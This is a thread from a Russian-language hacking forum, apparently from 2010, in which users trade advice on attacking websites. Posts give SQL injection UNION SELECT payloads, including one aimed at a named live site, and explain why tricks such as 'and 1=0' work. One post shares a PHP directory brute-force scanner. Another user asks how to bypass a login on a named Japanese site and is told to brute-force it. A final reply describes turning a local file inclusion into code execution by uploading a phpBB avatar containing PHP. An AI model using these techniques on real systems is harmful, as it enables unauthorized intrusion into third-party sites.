Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    v1d0qz не имеет значение через что давать БД команды .. пхпмайадмин это всего лишь ГУИ ... поэтому файл если не ошибаюсь если не указываеть полную дерикторию зальётся в папку с Базой ... но в этом я не уверен =)
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    блин все таки вот пришлос в студию линк:
    никакие запросы не подходит ((
     
  3. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    Если указать слэш перед названием, то зальется в корень, а если не указывать, как у тебя в примере, то он скорее всего зальется туда, где хранятся записи самого мускула, вот тебе резалт теста на локалхосте:
    Запрос:
    SELECT * FROM injection.uzaz INTO OUTFILE '/dump.txt'

    Итоговое расположение:
    [DISK]:\usr\local\mysql5\data\injection
     
    1 person likes this.
  4. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    http://site.ru/script.php?id=-1'+union+select+1,2,3,4+--+

    Будет работать при mq=off

    PHP:
    mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");
    Когда стоят кавычки '', запрос получается:

    PHP:
    $response=mysql_query("SELECT * FROM articles WHERE id='1+union+select+1,3,4+--+'");
    php вернет ошибку из-за незакрытой кавычки. Нужно закрыть кавычку и делать запрос:

    PHP:
    $response=mysql_query("SELECT * FROM articles WHERE id='1' union select 1,2,3,4+--+'");
    Читай: http://forum.antichat.ru/thread19844.html
     
    #11084 .:[melkiy]:., 16 Jan 2010
    Last edited: 15 Feb 2010
    2 people like this.
  5. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    прав, но зачем? ведь но суть вопроса не в этом.

    бред, что за "незакрытая кавычка"? и в данном случае ошибку mysql_fetch_array возвращает не mysql, а php.
     
    1 person likes this.
  6. guspertiz

    guspertiz New Member

    Joined:
    15 Jan 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет,
    у меня такой вопрос есть японский сайт http://www.104club.info/
    там есть подраздел http://www.104club.info/indicator
    но при переходе он требует логин и пароль, кто может подсказать как его обойти?
    Заранее спасибо
     
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    так что с пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+ ничего незяли сделать?
     
  8. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    Обойти никак, можно побрутить...
     
  9. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    Обойти можно, как правильно подметил nemaniak, только брутом. Попробуй просканить сайтец на полезные файлы/папки, авось и .htpasswd доступен для чтения :) . Может че найдешь.

    Лови скриптик на скорую руку
    PHP:
    <form action='<?=$_SERVER[PHP_SELF]?>' method='POST'>
    <pre>
    URL without ending slash!:<a href='#' title='exmpl: http://www.site.com' style='text-decoration: none'>?</a><input type='text' name='host' size='50' /><br/>
    File with dirs:<a href='#' title='exmpl: dirs.txt (with Path)' style='text-decoration: none'>?</a> <input type='text' name='dirs'  size='50' value='./dirs.txt'/><br/>
    <input type='submit' name='gogo' value='Scan' />
    </pre>
    </form>
    <hr/>
    <?php
    if($_POST['gogo'] && trim($_POST['host']) != '' && trim($_POST['dirs']) != ''){
        
    $host $_POST['host'];
        
    $dirs = @file($_POST['dirs']);
        if (!
    $dirs) die ('Can`t open file');
        foreach (
    $dirs as $v){
            
    $temp = @get_headers($host.trim($v));
            
    $found false;
            if (
    preg_match('#200#'$temp[0])) {echo $host.'<b>'.$v.'</b> found! <br/>';}
            if (
    preg_match('#403#'$temp[0])) {echo $host.'<b>'.$v.'</b> is forbidden! <br/>';}
            if (
    preg_match('#404#'$temp[0])) { continue;}
        }

    } else if (
    $_POST['gogo'] && (trim($_POST['host']) == '' || trim($_POST['dirs']) == '')) {
    die(
    'All fields required');
    }
    ?>
    Файл dirs должен быть вот такого вида:
    /admin/
    /admin.php
    /indicator
    ...
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы
     
  11. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    Извиняюсь, то была шутка.
     
  12. Серёжа393

    Joined:
    28 Dec 2009
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Спасибо, помогло. понял. постате ему +.
    А теперь расскажите пожалуйста, почему так работает
    Code:
    .php?id=-1[COLOR=DarkOrange]'[/COLOR]+union+select+1,version(),3,4,5,6,7,8+--+
    а так нет

    Code:
    .php?id=-1[COLOR=DarkOrange]'[/COLOR]+union+select+1,version(),3,4,5,6,7,8--
    т.е. как влияют плюсики??
     
    #11092 Серёжа393, 17 Jan 2010
    Last edited: 17 Jan 2010
  13. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    143
    Likes Received:
    244
    Reputations:
    73
    Для комментирование с помощью -- нужно наличие хотя бы одного пробела после второго тире.
     
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    143
    Likes Received:
    244
    Reputations:
    73
    Он спросил,почему без пробела не работает. А частные случаи это уже вообще не в тему. Такое чувство,что тебе пофиг что писать, лишь бы что-то.
     
    1 person likes this.
  15. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    оно и без комментов работает, там и так конец запроса
     
    1 person likes this.
  16. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    всем привет...объясните плз, вот часто вижу такие варианты инъекций
    ?id=123+and+1=0+union+select+1,2,3/*
    ?id=123+or+1=0+union+select+1,2,3/*
    с подстановкой ', +and+1=2, +or+1=2 и т.д. для поиска уязвимостей вроде понятно, а для чего нужны вышеприведенные примеры? что они делают? из того что я нашел
    вроде что-то понятно, но не до конца ) может кто нить объяснить??
     
    2 people like this.
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Gidz, не во всех случаях бывает, что Выводится ошибка, бывает просто пустой лист, поэтому и применяются подзапросы типа and или or, например, если это выводит ошибку ?id=123+and+1=0+union+select+1,2,3/*, а ?id=123+and+1=1+union+select+1,2,3/* выводит саму страницу 123, то мы имеем инъекцию
     
    1 person likes this.
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Зачем говоришь, если сам абсолютно ничего в этом не понимаешь?

    "and 1=0" это не подзапрос. Бывает так, что из БД не выводятся в цикле все значения, а только первая запись. При запросе
    Code:
    SELECT `id`, `username`, `password` FROM `users` WHERE `id` = 1 UNION SELECT 1,2,3
    mysql вернет результат, состоящий из двух строк, примерно так:
    Code:
    1 admin pass
    1 2 3
    Так вот, если в скрипте выводится только первая строка, то надо сделать так, чтобы первой была строка с нашей инъекцией, поэтому и добавляется "and 1=0", "and null", etc... Таким образом запрос будет:
    Code:
    SELECT `id`, `username`, `password` FROM `users` WHERE `id` = 1 AND 1=0 UNION SELECT 1,2,3
    Тоесть с БД выбирается та строка, где id = 0 и 1 = 2. 1 не будет равно 2 никогда, поэтому такой строки нету, и первой будет строка
    Code:
    1 2 3
     
    #11098 mailbrush, 17 Jan 2010
    Last edited: 17 Jan 2010
    6 people like this.
  19. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть сайт на котором если 2 инклуда но в обеих стоит папка в скрипте допустим
    PHP:
    include('config/'.$page.'.php');
    $page передается без экранирования

    Можно ли сделать инклуд с внешних ресурсов, если нет то что можно полезного достать через локальный инклуд

    ПС на сайте есть форум phpBB
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    С внешних ресурсов не заинклудишь, т.к. есть префикс config, НО тебе крупно повезло, что есть phpBB форум. Зарегайся на нем, залей аватару с PHP-кодом, проинклудь её, PHP-код выполнится.
     
Loading...
Thread Status:
Not open for further replies.